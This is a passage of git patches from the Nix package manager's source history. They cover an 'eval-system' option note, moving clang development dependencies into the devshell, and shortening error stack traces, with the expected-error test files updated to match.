+Add a new `eval-system` option. +Unlike `system`, it just overrides the value of `builtins.currentSystem`. +This is more useful than overriding `system`, because you can build these derivations on remote builders which can work on the given system. +In contrast, `system` also effects scheduling which will cause Nix to build those derivations locally even if that doesn't make sense. + +`eval-system` only takes effect if it is non-empty. +If empty (the default) `system` is used as before, so there is no breakage. From 66d37b73383e40f0362b82a0e29c60d2913d689a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jos=C3=A9=20Luis=20Lafuente?= Date: Fri, 15 Dec 2023 12:41:38 +0100 Subject: [PATCH 127/654] Move clang dev deps to the nix devshell override --- flake.nix | 5 ++++- package.nix | 4 ---- 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/flake.nix b/flake.nix index eb3846564..8c4436729 100644 --- a/flake.nix +++ b/flake.nix @@ -395,7 +395,7 @@ stdenvs))); devShells = let - makeShell = pkgs: stdenv: (pkgs.nix.override { inherit stdenv; }).overrideAttrs (_: { + makeShell = pkgs: stdenv: (pkgs.nix.override { inherit stdenv; }).overrideAttrs (attrs: { installFlags = "sysconfdir=$(out)/etc"; shellHook = '' PATH=$prefix/bin:$PATH @@ -405,6 +405,9 @@ # Make bash completion work. XDG_DATA_DIRS+=:$out/share ''; + nativeBuildInputs = attrs.nativeBuildInputs or [] + ++ lib.optional stdenv.cc.isClang pkgs.buildPackages.bear + ++ lib.optional (stdenv.cc.isClang && stdenv.hostPlatform == stdenv.buildPlatform) pkgs.buildPackages.clang-tools; }); in forAllSystems (system: diff --git a/package.nix b/package.nix index 6ea5bf9c9..24395b484 100644 --- a/package.nix +++ b/package.nix @@ -5,7 +5,6 @@ , autoreconfHook , aws-sdk-cpp , boehmgc -, buildPackages , nlohmann_json , bison , boost @@ -208,9 +207,6 @@ in { # changelog ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d ++ lib.optional enableInternalAPIDocs doxygen - - ++ lib.optional stdenv.cc.isClang buildPackages.bear - ++ lib.optional (stdenv.cc.isClang && stdenv.hostPlatform == stdenv.buildPlatform) buildPackages.clang-tools ; buildInputs = lib.optionals doBuild [ From 5cb98095ba2c3de83d32c1729da7b9f6cfb1aeff Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 15 Dec 2023 23:56:17 -0800 Subject: [PATCH 128/654] Remove some blank lines from stack traces MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This keeps hint messages, source location information, and source code snippets grouped together, while making stack traces shorter (so that more stack frames can be viewed on the same terminal). Before: error: … while evaluating the attribute 'body' at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: 3| 4| body = x "x"; | ^ 5| } … from call site at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:10: 3| 4| body = x "x"; | ^ 5| } … while calling 'x' at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:7: 1| let { 2| x = arg: assert arg == "y"; 123; | ^ 3| error: assertion '(arg == "y")' failed at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: 1| let { 2| x = arg: assert arg == "y"; 123; | ^ 3| After: error: … while evaluating the attribute 'body' at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: 3| 4| body = x "x"; | ^ 5| } … from call site at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:10: 3| 4| body = x "x"; | ^ 5| } … while calling 'x' at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:7: 1| let { 2| x = arg: assert arg == "y"; 123; | ^ 3| error: assertion '(arg == "y")' failed at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: 1| let { 2| x = arg: assert arg == "y"; 123; | ^ 3| --- src/libutil/error.cc | 3 +-- tests/functional/lang/eval-fail-abort.err.exp | 2 -- ...il-addDrvOutputDependencies-empty-context.err.exp | 2 -- ...dDrvOutputDependencies-multi-elem-context.err.exp | 2 -- ...dDrvOutputDependencies-wrong-element-kind.err.exp | 2 -- tests/functional/lang/eval-fail-assert.err.exp | 8 -------- .../functional/lang/eval-fail-attr-name-type.err.exp | 4 ---- .../eval-fail-bad-string-interpolation-1.err.exp | 2 -- .../eval-fail-bad-string-interpolation-3.err.exp | 2 -- .../eval-fail-bad-string-interpolation-4.err.exp | 2 -- tests/functional/lang/eval-fail-blackhole.err.exp | 4 ---- tests/functional/lang/eval-fail-call-primop.err.exp | 2 -- tests/functional/lang/eval-fail-deepseq.err.exp | 6 ------ .../lang/eval-fail-dup-dynamic-attrs.err.exp | 4 ---- ...al-fail-foldlStrict-strict-op-application.err.exp | 8 -------- .../lang/eval-fail-fromTOML-timestamps.err.exp | 2 -- .../lang/eval-fail-hashfile-missing.err.exp | 2 -- tests/functional/lang/eval-fail-list.err.exp | 2 -- tests/functional/lang/eval-fail-missing-arg.err.exp | 4 ---- tests/functional/lang/eval-fail-not-throws.err.exp | 4 ---- tests/functional/lang/eval-fail-path-slash.err.exp | 2 -- tests/functional/lang/eval-fail-recursion.err.exp | 4 ---- tests/functional/lang/eval-fail-remove.err.exp | 4 ---- tests/functional/lang/eval-fail-scope-5.err.exp | 8 -------- tests/functional/lang/eval-fail-seq.err.exp | 4 ---- tests/functional/lang/eval-fail-set.err.exp | 2 -- tests/functional/lang/eval-fail-substring.err.exp | 2 -- tests/functional/lang/eval-fail-to-path.err.exp | 2 -- tests/functional/lang/eval-fail-toJSON.err.exp | 12 ------------ .../functional/lang/eval-fail-undeclared-arg.err.exp | 4 ---- .../lang/eval-fail-using-set-as-attr-name.err.exp | 2 -- tests/functional/lang/parse-fail-dup-attrs-1.err.exp | 2 -- tests/functional/lang/parse-fail-dup-attrs-2.err.exp | 2 -- tests/functional/lang/parse-fail-dup-attrs-3.err.exp | 2 -- tests/functional/lang/parse-fail-dup-attrs-4.err.exp | 2 -- tests/functional/lang/parse-fail-dup-attrs-7.err.exp | 2 -- tests/functional/lang/parse-fail-dup-formals.err.exp | 2 -- .../functional/lang/parse-fail-eof-in-string.err.exp | 2 -- .../lang/parse-fail-mixed-nested-attrs1.err.exp | 2 -- .../lang/parse-fail-mixed-nested-attrs2.err.exp | 2 -- tests/functional/lang/parse-fail-patterns-1.err.exp | 2 -- .../lang/parse-fail-regression-20060610.err.exp | 2 -- tests/functional/lang/parse-fail-undef-var-2.err.exp | 2 -- tests/functional/lang/parse-fail-undef-var.err.exp | 2 -- tests/functional/lang/parse-fail-utf8.err.exp | 2 -- 45 files changed, 1 insertion(+), 140 deletions(-) diff --git a/src/libutil/error.cc b/src/libutil/error.cc index 72c346cb5..bc0194d59 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -173,10 +173,9 @@ static bool printUnknownLocations = getEnv("_NIX_EVAL_SHOW_UNKNOWN_LOCATIONS").h static bool printPosMaybe(std::ostream & oss, std::string_view indent, const std::shared_ptr & pos) { bool hasPos = pos && *pos; if (hasPos) { - oss << "\n" << indent << ANSI_BLUE << "at " ANSI_WARNING << *pos << ANSI_NORMAL << ":"; + oss << indent << ANSI_BLUE << "at " ANSI_WARNING << *pos << ANSI_NORMAL << ":"; if (auto loc = pos->getCodeLines()) { - oss << "\n"; printCodeLines(oss, "", *pos, *loc); oss << "\n"; } diff --git a/tests/functional/lang/eval-fail-abort.err.exp b/tests/functional/lang/eval-fail-abort.err.exp index 345232d3f..20e7b9e18 100644 --- a/tests/functional/lang/eval-fail-abort.err.exp +++ b/tests/functional/lang/eval-fail-abort.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'abort' builtin - at /pwd/lang/eval-fail-abort.nix:1:14: - 1| if true then abort "this should fail" else 1 | ^ 2| diff --git a/tests/functional/lang/eval-fail-addDrvOutputDependencies-empty-context.err.exp b/tests/functional/lang/eval-fail-addDrvOutputDependencies-empty-context.err.exp index ad91a22aa..37e0bd9ee 100644 --- a/tests/functional/lang/eval-fail-addDrvOutputDependencies-empty-context.err.exp +++ b/tests/functional/lang/eval-fail-addDrvOutputDependencies-empty-context.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'addDrvOutputDependencies' builtin - at /pwd/lang/eval-fail-addDrvOutputDependencies-empty-context.nix:1:1: - 1| builtins.addDrvOutputDependencies "" | ^ 2| diff --git a/tests/functional/lang/eval-fail-addDrvOutputDependencies-multi-elem-context.err.exp b/tests/functional/lang/eval-fail-addDrvOutputDependencies-multi-elem-context.err.exp index bb389db4e..6828e03c8 100644 --- a/tests/functional/lang/eval-fail-addDrvOutputDependencies-multi-elem-context.err.exp +++ b/tests/functional/lang/eval-fail-addDrvOutputDependencies-multi-elem-context.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'addDrvOutputDependencies' builtin - at /pwd/lang/eval-fail-addDrvOutputDependencies-multi-elem-context.nix:18:4: - 17| 18| in builtins.addDrvOutputDependencies combo-path | ^ diff --git a/tests/functional/lang/eval-fail-addDrvOutputDependencies-wrong-element-kind.err.exp b/tests/functional/lang/eval-fail-addDrvOutputDependencies-wrong-element-kind.err.exp index 070381118..72b5e6368 100644 --- a/tests/functional/lang/eval-fail-addDrvOutputDependencies-wrong-element-kind.err.exp +++ b/tests/functional/lang/eval-fail-addDrvOutputDependencies-wrong-element-kind.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'addDrvOutputDependencies' builtin - at /pwd/lang/eval-fail-addDrvOutputDependencies-wrong-element-kind.nix:9:4: - 8| 9| in builtins.addDrvOutputDependencies drv.outPath | ^ diff --git a/tests/functional/lang/eval-fail-assert.err.exp b/tests/functional/lang/eval-fail-assert.err.exp index aeecd8167..0656ec81c 100644 --- a/tests/functional/lang/eval-fail-assert.err.exp +++ b/tests/functional/lang/eval-fail-assert.err.exp @@ -1,35 +1,27 @@ error: … while evaluating the attribute 'body' - at /pwd/lang/eval-fail-assert.nix:4:3: - 3| 4| body = x "x"; | ^ 5| } … from call site - at /pwd/lang/eval-fail-assert.nix:4:10: - 3| 4| body = x "x"; | ^ 5| } … while calling 'x' - at /pwd/lang/eval-fail-assert.nix:2:7: - 1| let { 2| x = arg: assert arg == "y"; 123; | ^ 3| error: assertion '(arg == "y")' failed - at /pwd/lang/eval-fail-assert.nix:2:12: - 1| let { 2| x = arg: assert arg == "y"; 123; | ^ diff --git a/tests/functional/lang/eval-fail-attr-name-type.err.exp b/tests/functional/lang/eval-fail-attr-name-type.err.exp index 5f9a073dd..23cceb58a 100644 --- a/tests/functional/lang/eval-fail-attr-name-type.err.exp +++ b/tests/functional/lang/eval-fail-attr-name-type.err.exp @@ -1,17 +1,13 @@ error: … while evaluating the attribute 'puppy."${key}"' - at /pwd/lang/eval-fail-attr-name-type.nix:3:5: - 2| attrs = { 3| puppy.doggy = {}; | ^ 4| }; … while evaluating an attribute name - at /pwd/lang/eval-fail-attr-name-type.nix:7:17: - 6| in 7| attrs.puppy.${key} | ^ diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp index eb73e9a52..b461b2e02 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp @@ -1,8 +1,6 @@ error: … while evaluating a path segment - at /pwd/lang/eval-fail-bad-string-interpolation-1.nix:1:2: - 1| "${x: x}" | ^ 2| diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp index ac14f329b..95f4c2460 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp @@ -1,8 +1,6 @@ error: … while evaluating a path segment - at /pwd/lang/eval-fail-bad-string-interpolation-3.nix:1:3: - 1| ''${x: x}'' | ^ 2| diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp index 07843a480..4950f8ddb 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp @@ -1,8 +1,6 @@ error: … while evaluating a path segment - at /pwd/lang/eval-fail-bad-string-interpolation-4.nix:9:3: - 8| # The error message should not be too long. 9| ''${pkgs}'' | ^ diff --git a/tests/functional/lang/eval-fail-blackhole.err.exp b/tests/functional/lang/eval-fail-blackhole.err.exp index f0618d8ac..95e33a5fe 100644 --- a/tests/functional/lang/eval-fail-blackhole.err.exp +++ b/tests/functional/lang/eval-fail-blackhole.err.exp @@ -1,17 +1,13 @@ error: … while evaluating the attribute 'body' - at /pwd/lang/eval-fail-blackhole.nix:2:3: - 1| let { 2| body = x; | ^ 3| x = y; error: infinite recursion encountered - at /pwd/lang/eval-fail-blackhole.nix:3:7: - 2| body = x; 3| x = y; | ^ diff --git a/tests/functional/lang/eval-fail-call-primop.err.exp b/tests/functional/lang/eval-fail-call-primop.err.exp index 19b407c47..ae5b55ed4 100644 --- a/tests/functional/lang/eval-fail-call-primop.err.exp +++ b/tests/functional/lang/eval-fail-call-primop.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'length' builtin - at /pwd/lang/eval-fail-call-primop.nix:1:1: - 1| builtins.length 1 | ^ 2| diff --git a/tests/functional/lang/eval-fail-deepseq.err.exp b/tests/functional/lang/eval-fail-deepseq.err.exp index 5e204ba73..11b62340d 100644 --- a/tests/functional/lang/eval-fail-deepseq.err.exp +++ b/tests/functional/lang/eval-fail-deepseq.err.exp @@ -1,24 +1,18 @@ error: … while calling the 'deepSeq' builtin - at /pwd/lang/eval-fail-deepseq.nix:1:1: - 1| builtins.deepSeq { x = abort "foo"; } 456 | ^ 2| … while evaluating the attribute 'x' - at /pwd/lang/eval-fail-deepseq.nix:1:20: - 1| builtins.deepSeq { x = abort "foo"; } 456 | ^ 2| … while calling the 'abort' builtin - at /pwd/lang/eval-fail-deepseq.nix:1:24: - 1| builtins.deepSeq { x = abort "foo"; } 456 | ^ 2| diff --git a/tests/functional/lang/eval-fail-dup-dynamic-attrs.err.exp b/tests/functional/lang/eval-fail-dup-dynamic-attrs.err.exp index c5fa67523..834f9c67b 100644 --- a/tests/functional/lang/eval-fail-dup-dynamic-attrs.err.exp +++ b/tests/functional/lang/eval-fail-dup-dynamic-attrs.err.exp @@ -1,17 +1,13 @@ error: … while evaluating the attribute 'set' - at /pwd/lang/eval-fail-dup-dynamic-attrs.nix:2:3: - 1| { 2| set = { "${"" + "b"}" = 1; }; | ^ 3| set = { "${"b" + ""}" = 2; }; error: dynamic attribute 'b' already defined at /pwd/lang/eval-fail-dup-dynamic-attrs.nix:2:11 - at /pwd/lang/eval-fail-dup-dynamic-attrs.nix:3:11: - 2| set = { "${"" + "b"}" = 1; }; 3| set = { "${"b" + ""}" = 2; }; | ^ diff --git a/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp b/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp index 0069285fb..7cb08af8a 100644 --- a/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp +++ b/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp @@ -1,35 +1,27 @@ error: … while calling the 'foldl'' builtin - at /pwd/lang/eval-fail-foldlStrict-strict-op-application.nix:2:1: - 1| # Tests that the result of applying op is forced even if the value is never used 2| builtins.foldl' | ^ 3| (_: f: f null) … while calling anonymous lambda - at /pwd/lang/eval-fail-foldlStrict-strict-op-application.nix:3:7: - 2| builtins.foldl' 3| (_: f: f null) | ^ 4| null … from call site - at /pwd/lang/eval-fail-foldlStrict-strict-op-application.nix:3:10: - 2| builtins.foldl' 3| (_: f: f null) | ^ 4| null … while calling anonymous lambda - at /pwd/lang/eval-fail-foldlStrict-strict-op-application.nix:5:6: - 4| null 5| [ (_: throw "Not the final value, but is still forced!") (_: 23) ] | ^ diff --git a/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp b/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp index 5b60d253d..73f9df8cc 100644 --- a/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp +++ b/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'fromTOML' builtin - at /pwd/lang/eval-fail-fromTOML-timestamps.nix:1:1: - 1| builtins.fromTOML '' | ^ 2| key = "value" diff --git a/tests/functional/lang/eval-fail-hashfile-missing.err.exp b/tests/functional/lang/eval-fail-hashfile-missing.err.exp index 6d38608c0..1e4653927 100644 --- a/tests/functional/lang/eval-fail-hashfile-missing.err.exp +++ b/tests/functional/lang/eval-fail-hashfile-missing.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'toString' builtin - at /pwd/lang/eval-fail-hashfile-missing.nix:4:3: - 3| in 4| toString (builtins.concatLists (map (hash: map (builtins.hashFile hash) paths) ["md5" "sha1" "sha256" "sha512"])) | ^ diff --git a/tests/functional/lang/eval-fail-list.err.exp b/tests/functional/lang/eval-fail-list.err.exp index 24d682118..4320fc022 100644 --- a/tests/functional/lang/eval-fail-list.err.exp +++ b/tests/functional/lang/eval-fail-list.err.exp @@ -1,8 +1,6 @@ error: … while evaluating one of the elements to concatenate - at /pwd/lang/eval-fail-list.nix:1:2: - 1| 8++1 | ^ 2| diff --git a/tests/functional/lang/eval-fail-missing-arg.err.exp b/tests/functional/lang/eval-fail-missing-arg.err.exp index 61fabf0d5..3b162fe1b 100644 --- a/tests/functional/lang/eval-fail-missing-arg.err.exp +++ b/tests/functional/lang/eval-fail-missing-arg.err.exp @@ -1,16 +1,12 @@ error: … from call site - at /pwd/lang/eval-fail-missing-arg.nix:1:1: - 1| ({x, y, z}: x + y + z) {x = "foo"; z = "bar";} | ^ 2| error: function 'anonymous lambda' called without required argument 'y' - at /pwd/lang/eval-fail-missing-arg.nix:1:2: - 1| ({x, y, z}: x + y + z) {x = "foo"; z = "bar";} | ^ 2| diff --git a/tests/functional/lang/eval-fail-not-throws.err.exp b/tests/functional/lang/eval-fail-not-throws.err.exp index b290afb0a..fc81f7277 100644 --- a/tests/functional/lang/eval-fail-not-throws.err.exp +++ b/tests/functional/lang/eval-fail-not-throws.err.exp @@ -1,16 +1,12 @@ error: … in the argument of the not operator - at /pwd/lang/eval-fail-not-throws.nix:1:4: - 1| ! (throw "uh oh!") | ^ 2| … while calling the 'throw' builtin - at /pwd/lang/eval-fail-not-throws.nix:1:4: - 1| ! (throw "uh oh!") | ^ 2| diff --git a/tests/functional/lang/eval-fail-path-slash.err.exp b/tests/functional/lang/eval-fail-path-slash.err.exp index f0011c97f..e3531d352 100644 --- a/tests/functional/lang/eval-fail-path-slash.err.exp +++ b/tests/functional/lang/eval-fail-path-slash.err.exp @@ -1,7 +1,5 @@ error: path has a trailing slash - at /pwd/lang/eval-fail-path-slash.nix:6:12: - 5| # and https://nixos.org/nix-dev/2016-June/020829.html 6| /nix/store/ | ^ diff --git a/tests/functional/lang/eval-fail-recursion.err.exp b/tests/functional/lang/eval-fail-recursion.err.exp index af64133cb..19380dc65 100644 --- a/tests/functional/lang/eval-fail-recursion.err.exp +++ b/tests/functional/lang/eval-fail-recursion.err.exp @@ -1,16 +1,12 @@ error: … in the right operand of the update (//) operator - at /pwd/lang/eval-fail-recursion.nix:1:12: - 1| let a = {} // a; in a.foo | ^ 2| error: infinite recursion encountered - at /pwd/lang/eval-fail-recursion.nix:1:15: - 1| let a = {} // a; in a.foo | ^ 2| diff --git a/tests/functional/lang/eval-fail-remove.err.exp b/tests/functional/lang/eval-fail-remove.err.exp index e82cdac98..292b3c3f3 100644 --- a/tests/functional/lang/eval-fail-remove.err.exp +++ b/tests/functional/lang/eval-fail-remove.err.exp @@ -1,17 +1,13 @@ error: … while evaluating the attribute 'body' - at /pwd/lang/eval-fail-remove.nix:4:3: - 3| 4| body = (removeAttrs attrs ["x"]).x; | ^ 5| } error: attribute 'x' missing - at /pwd/lang/eval-fail-remove.nix:4:10: - 3| 4| body = (removeAttrs attrs ["x"]).x; | ^ diff --git a/tests/functional/lang/eval-fail-scope-5.err.exp b/tests/functional/lang/eval-fail-scope-5.err.exp index 22b6166f8..b0b05cad7 100644 --- a/tests/functional/lang/eval-fail-scope-5.err.exp +++ b/tests/functional/lang/eval-fail-scope-5.err.exp @@ -1,35 +1,27 @@ error: … while evaluating the attribute 'body' - at /pwd/lang/eval-fail-scope-5.nix:8:3: - 7| 8| body = f {}; | ^ 9| … from call site - at /pwd/lang/eval-fail-scope-5.nix:8:10: - 7| 8| body = f {}; | ^ 9| … while calling 'f' - at /pwd/lang/eval-fail-scope-5.nix:6:7: - 5| 6| f = {x ? y, y ? x}: x + y; | ^ 7| error: infinite recursion encountered - at /pwd/lang/eval-fail-scope-5.nix:6:12: - 5| 6| f = {x ? y, y ? x}: x + y; | ^ diff --git a/tests/functional/lang/eval-fail-seq.err.exp b/tests/functional/lang/eval-fail-seq.err.exp index 33a7e9491..3e3d71b15 100644 --- a/tests/functional/lang/eval-fail-seq.err.exp +++ b/tests/functional/lang/eval-fail-seq.err.exp @@ -1,16 +1,12 @@ error: … while calling the 'seq' builtin - at /pwd/lang/eval-fail-seq.nix:1:1: - 1| builtins.seq (abort "foo") 2 | ^ 2| … while calling the 'abort' builtin - at /pwd/lang/eval-fail-seq.nix:1:15: - 1| builtins.seq (abort "foo") 2 | ^ 2| diff --git a/tests/functional/lang/eval-fail-set.err.exp b/tests/functional/lang/eval-fail-set.err.exp index 0d0140508..6dd646e11 100644 --- a/tests/functional/lang/eval-fail-set.err.exp +++ b/tests/functional/lang/eval-fail-set.err.exp @@ -1,7 +1,5 @@ error: undefined variable 'x' - at /pwd/lang/eval-fail-set.nix:1:3: - 1| 8.x | ^ 2| diff --git a/tests/functional/lang/eval-fail-substring.err.exp b/tests/functional/lang/eval-fail-substring.err.exp index 5c58be29a..0457a826e 100644 --- a/tests/functional/lang/eval-fail-substring.err.exp +++ b/tests/functional/lang/eval-fail-substring.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'substring' builtin - at /pwd/lang/eval-fail-substring.nix:1:1: - 1| builtins.substring (builtins.sub 0 1) 1 "x" | ^ 2| diff --git a/tests/functional/lang/eval-fail-to-path.err.exp b/tests/functional/lang/eval-fail-to-path.err.exp index 4ffa2cf6d..d6b17be99 100644 --- a/tests/functional/lang/eval-fail-to-path.err.exp +++ b/tests/functional/lang/eval-fail-to-path.err.exp @@ -1,8 +1,6 @@ error: … while calling the 'toPath' builtin - at /pwd/lang/eval-fail-to-path.nix:1:1: - 1| builtins.toPath "foo/bar" | ^ 2| diff --git a/tests/functional/lang/eval-fail-toJSON.err.exp b/tests/functional/lang/eval-fail-toJSON.err.exp index 4e618c203..4f6003437 100644 --- a/tests/functional/lang/eval-fail-toJSON.err.exp +++ b/tests/functional/lang/eval-fail-toJSON.err.exp @@ -1,25 +1,19 @@ error: … while calling the 'toJSON' builtin - at /pwd/lang/eval-fail-toJSON.nix:1:1: - 1| builtins.toJSON { | ^ 2| a.b = [ … while evaluating attribute 'a' - at /pwd/lang/eval-fail-toJSON.nix:2:3: - 1| builtins.toJSON { 2| a.b = [ | ^ 3| true … while evaluating attribute 'b' - at /pwd/lang/eval-fail-toJSON.nix:2:3: - 1| builtins.toJSON { 2| a.b = [ | ^ @@ -28,27 +22,21 @@ error: … while evaluating list element at index 3 … while evaluating attribute 'c' - at /pwd/lang/eval-fail-toJSON.nix:7:7: - 6| { 7| c.d = throw "hah no"; | ^ 8| } … while evaluating attribute 'd' - at /pwd/lang/eval-fail-toJSON.nix:7:7: - 6| { 7| c.d = throw "hah no"; | ^ 8| } … while calling the 'throw' builtin - at /pwd/lang/eval-fail-toJSON.nix:7:13: - 6| { 7| c.d = throw "hah no"; | ^ diff --git a/tests/functional/lang/eval-fail-undeclared-arg.err.exp b/tests/functional/lang/eval-fail-undeclared-arg.err.exp index 30db743c7..6e13a138e 100644 --- a/tests/functional/lang/eval-fail-undeclared-arg.err.exp +++ b/tests/functional/lang/eval-fail-undeclared-arg.err.exp @@ -1,16 +1,12 @@ error: … from call site - at /pwd/lang/eval-fail-undeclared-arg.nix:1:1: - 1| ({x, z}: x + z) {x = "foo"; y = "bla"; z = "bar";} | ^ 2| error: function 'anonymous lambda' called with unexpected argument 'y' - at /pwd/lang/eval-fail-undeclared-arg.nix:1:2: - 1| ({x, z}: x + z) {x = "foo"; y = "bla"; z = "bar";} | ^ 2| diff --git a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp index 811d01b03..0a4f56ac5 100644 --- a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp +++ b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp @@ -1,8 +1,6 @@ error: … while evaluating an attribute name - at /pwd/lang/eval-fail-using-set-as-attr-name.nix:5:10: - 4| in 5| attr.${key} | ^ diff --git a/tests/functional/lang/parse-fail-dup-attrs-1.err.exp b/tests/functional/lang/parse-fail-dup-attrs-1.err.exp index 4fe6b7a1f..6c3a3510c 100644 --- a/tests/functional/lang/parse-fail-dup-attrs-1.err.exp +++ b/tests/functional/lang/parse-fail-dup-attrs-1.err.exp @@ -1,7 +1,5 @@ error: attribute 'x' already defined at «stdin»:1:3 - at «stdin»:3:3: - 2| y = 456; 3| x = 789; | ^ diff --git a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp index 3aba2891f..fecdece20 100644 --- a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp +++ b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp @@ -1,7 +1,5 @@ error: attribute 'x' already defined at «stdin»:9:5 - at «stdin»:10:17: - 9| x = 789; 10| inherit (as) x; | ^ diff --git a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp index 3aba2891f..fecdece20 100644 --- a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp +++ b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp @@ -1,7 +1,5 @@ error: attribute 'x' already defined at «stdin»:9:5 - at «stdin»:10:17: - 9| x = 789; 10| inherit (as) x; | ^ diff --git a/tests/functional/lang/parse-fail-dup-attrs-4.err.exp b/tests/functional/lang/parse-fail-dup-attrs-4.err.exp index ff68446a1..f85ffea51 100644 --- a/tests/functional/lang/parse-fail-dup-attrs-4.err.exp +++ b/tests/functional/lang/parse-fail-dup-attrs-4.err.exp @@ -1,7 +1,5 @@ error: attribute 'services.ssh.port' already defined at «stdin»:2:3 - at «stdin»:3:3: - 2| services.ssh.port = 22; 3| services.ssh.port = 23; | ^ diff --git a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp index 512a499ca..98cea9dae 100644 --- a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp +++ b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp @@ -1,7 +1,5 @@ error: attribute 'x' already defined at «stdin»:6:12 - at «stdin»:7:12: - 6| inherit x; 7| inherit x; | ^ diff --git a/tests/functional/lang/parse-fail-dup-formals.err.exp b/tests/functional/lang/parse-fail-dup-formals.err.exp index 1d566fb33..d7c7e0237 100644 --- a/tests/functional/lang/parse-fail-dup-formals.err.exp +++ b/tests/functional/lang/parse-fail-dup-formals.err.exp @@ -1,6 +1,4 @@ error: duplicate formal function argument 'x' - at «stdin»:1:8: - 1| {x, y, x}: x | ^ diff --git a/tests/functional/lang/parse-fail-eof-in-string.err.exp b/tests/functional/lang/parse-fail-eof-in-string.err.exp index f9fa72312..b28d35950 100644 --- a/tests/functional/lang/parse-fail-eof-in-string.err.exp +++ b/tests/functional/lang/parse-fail-eof-in-string.err.exp @@ -1,7 +1,5 @@ error: syntax error, unexpected end of file, expecting '"' - at «stdin»:3:5: - 2| # Note that this file must not end with a newline. 3| a 1"$ | ^ diff --git a/tests/functional/lang/parse-fail-mixed-nested-attrs1.err.exp b/tests/functional/lang/parse-fail-mixed-nested-attrs1.err.exp index 32f776795..a4472156b 100644 --- a/tests/functional/lang/parse-fail-mixed-nested-attrs1.err.exp +++ b/tests/functional/lang/parse-fail-mixed-nested-attrs1.err.exp @@ -1,7 +1,5 @@ error: attribute 'z' already defined at «stdin»:3:16 - at «stdin»:2:3: - 1| { 2| x.z = 3; | ^ diff --git a/tests/functional/lang/parse-fail-mixed-nested-attrs2.err.exp b/tests/functional/lang/parse-fail-mixed-nested-attrs2.err.exp index 0437cd50c..ead1f0dbd 100644 --- a/tests/functional/lang/parse-fail-mixed-nested-attrs2.err.exp +++ b/tests/functional/lang/parse-fail-mixed-nested-attrs2.err.exp @@ -1,7 +1,5 @@ error: attribute 'y' already defined at «stdin»:3:9 - at «stdin»:2:3: - 1| { 2| x.y.y = 3; | ^ diff --git a/tests/functional/lang/parse-fail-patterns-1.err.exp b/tests/functional/lang/parse-fail-patterns-1.err.exp index 634a04aaa..6ba39d884 100644 --- a/tests/functional/lang/parse-fail-patterns-1.err.exp +++ b/tests/functional/lang/parse-fail-patterns-1.err.exp @@ -1,7 +1,5 @@ error: duplicate formal function argument 'args' - at «stdin»:1:1: - 1| args@{args, x, y, z}: x | ^ 2| diff --git a/tests/functional/lang/parse-fail-regression-20060610.err.exp b/tests/functional/lang/parse-fail-regression-20060610.err.exp index 167d01e85..d8875a6a5 100644 --- a/tests/functional/lang/parse-fail-regression-20060610.err.exp +++ b/tests/functional/lang/parse-fail-regression-20060610.err.exp @@ -1,7 +1,5 @@ error: undefined variable 'gcc' - at «stdin»:8:12: - 7| 8| body = ({ | ^ diff --git a/tests/functional/lang/parse-fail-undef-var-2.err.exp 